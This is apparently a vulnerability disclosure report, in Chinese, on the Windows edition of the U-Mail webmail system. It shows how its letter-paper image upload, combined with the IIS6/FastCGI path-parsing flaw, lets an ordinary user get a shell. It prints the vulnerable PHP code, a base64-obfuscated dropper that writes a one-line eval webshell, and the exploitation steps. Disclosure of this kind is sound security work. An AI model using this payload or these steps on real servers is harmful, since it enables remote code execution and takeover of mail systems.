### 简要描述: U-Mail邮件系统windows版本存在缺陷,导致普通用户getshell ### 详细说明: 环境说明:官网下载windows版最新版,windows server 2003+IIS6搭建、登录邮箱测试时候使用最新版chrome浏览器,需要普通用户登录 漏洞文件: C:\umail\WorldClient\html\client\option\module\o_letterpaper.php 代码: ``` if ( ACTION == "letterpaper-img-upload" ) { $targetFolder = getusercachepath( ); $verifyToken = md5( "unique_salt".$_POST['timestamp'] ); if ( !empty( $_FILES ) || $_POST['token'] == $verifyToken ) { $tempFile = $_FILES['Filedata']['tmp_name']; $targetPath = $targetFolder; $targetFile = rtrim( $targetPath, "/" )."/letterpaper_".$_FILES['Filedata']['name']; $fileTypes = array( "jpg", "jpeg", "gif", "png" ); $fileParts = pathinfo( $_FILES['Filedata']['name'] ); if ( in_array( $fileParts['extension'], $fileTypes ) ) { $handle = opendir( $targetPath ); while ( ( $file = readdir( $handle ) ) !== FALSE ) { if ( !( $file != "." ) && !( $file != ".." ) && strpos( $file, "letterpaper_" ) === FALSE ) { $dir = rtrim( $targetPath, "/" ).DIRECTORY_SEPARATOR.$file; unlink( $dir );...
### 简要描述: U-Mail邮件系统windows版本存在缺陷,导致普通用户getshell ### 详细说明: 环境说明:官网下载windows版最新版,windows server 2003+IIS6搭建、登录邮箱测试时候使用最新版chrome浏览器,需要普通用户登录 漏洞文件: C:\umail\WorldClient\html\client\option\module\o_letterpaper.php 代码: ``` if ( ACTION == "letterpaper-img-upload" ) { $targetFolder = getusercachepath( ); $verifyToken = md5( "unique_salt".$_POST['timestamp'] ); if ( !empty( $_FILES ) || $_POST['token'] == $verifyToken ) { $tempFile = $_FILES['Filedata']['tmp_name']; $targetPath = $targetFolder; $targetFile = rtrim( $targetPath, "/" )."/letterpaper_".$_FILES['Filedata']['name']; $fileTypes = array( "jpg", "jpeg", "gif", "png" ); $fileParts = pathinfo( $_FILES['Filedata']['name'] ); if ( in_array( $fileParts['extension'], $fileTypes ) ) { $handle = opendir( $targetPath ); while ( ( $file = readdir( $handle ) ) !== FALSE ) { if ( !( $file != "." ) && !( $file != ".." ) && strpos( $file, "letterpaper_" ) === FALSE ) { $dir = rtrim( $targetPath, "/" ).DIRECTORY_SEPARATOR.$file; unlink( $dir ); } } closedir( $handle ); if ( move_uploaded_file( $tempFile, $targetFile ) ) { $thumbFile = rtrim( $targetPath, "/" )."/letterpaper_".$fileParts['filename']."_thumb.".$fileParts['extension']; $thumbUrl = rtrim( WEBMAIL_URL, "/" )."/cache/".$user_id."/letterpaper_".$fileParts['filename']."_thumb.".$fileParts['extension']; $targetUrl = rtrim( WEBMAIL_URL, "/" )."/cache/".$user_id."/letterpaper_".$_FILES['Filedata']['name']; if ( img2thumb( $targetFile, $thumbFile, $width = 100, $height = 100, $cut = 1, $proportion = 0 ) ) { dump_json( array( "status" => 1, "file" => $targetFile, "fileUrl" => $targetUrl, "thumb" => $thumbFile, "thumbUrl" => $thumbUrl ) ); } else { unlink( $targetFile ); exit( ); } } } else { dump_json( array( "status" => 0, "msg" => "Invalid file type." ) ); } } } ``` 此处为信纸的上传图片的页面,只允许jpg等图片格式的上传,由于是windows版的,可以结合iis6.0的解析漏洞,但上传成功a.php;a.jpg时候会提示错误,脚本执行错误500。然后此php是以fastcgi形式跑的,因而利用v.jpg/a.php解析漏洞。此默认安装包的php版本为 [<img src="https://images.seebug.org/upload/201405/1618505037818a71917c121c3e782bf5e8f4ca52.png" alt="d5d1e8a2-1150-47f6-a1c2-33a076b14409.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1618505037818a71917c121c3e782bf5e8f4ca52.png) 漏洞利用过程 准备图片木马,必须是图片,然后里面需嵌入php代码为 <?php @fwrite(fopen(base64_decode('ZnVjay5waHA='),w), base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydmdWNrJ10pOz8+')); 注意不要闭合,会报错。代码执行后会在当前目录下生成fuck.php的一句话木马 此处的图片木马为 [<img src="https://images.seebug.org/upload/201405/161851365da85b5aaa472acf4075f022851fe663.jpg" alt="ddd.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/161851365da85b5aaa472acf4075f022851fe663.jpg) 若不是图片木马,则在执行函数的 if ( img2thumb( $targetFile, $thumbFile, $width = 100, $height = 100, $cut = 1, $proportion = 0 ) ) 会出错,查看到的相应内容里不会有上传后的地址,如图 [<img src="https://images.seebug.org/upload/201405/1618521634479267f85d9c167f8ec6ebf64b7d72.png" alt="abfe8804-34c4-4705-8ecf-df0a7f3d2e87.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1618521634479267f85d9c167f8ec6ebf64b7d72.png) chrome浏览登录邮箱后,设置代理 [<img src="https://images.seebug.org/upload/201405/16185256a2d2c24943561902f768f938b5b7881c.png" alt="a4c5dae0-0077-4668-8d5a-a60beb2633f5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/16185256a2d2c24943561902f768f938b5b7881c.png) 查看响应 [<img src="https://images.seebug.org/upload/201405/161853348e42c5326241a26dc8ae3c9a656c592e.png" alt="dd.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/161853348e42c5326241a26dc8ae3c9a656c592e.png) 获得的上传后地址为, /webmail/client/cache/5/letterpaper_v.jpg ok,浏览器访问//webmail/client/cache/5/letterpaper_v.jpg/a.php [<img src="https://images.seebug.org/upload/201405/1618540971e3bd0b39ed67cce2f3f561c1296b57.png" alt="bb.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1618540971e3bd0b39ed67cce2f3f561c1296b57.png) 官网未提供设置信纸功能,但同样可以本地提交,修改post地址获取webshell,未具体测试 官网是有解析漏洞的,如下 [<img src="https://images.seebug.org/upload/201405/161854522fa128e8087eb14cd907e7d619959a21.png" alt="dw.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/161854522fa128e8087eb14cd907e7d619959a21.png) ### 漏洞证明: 如上详细描述
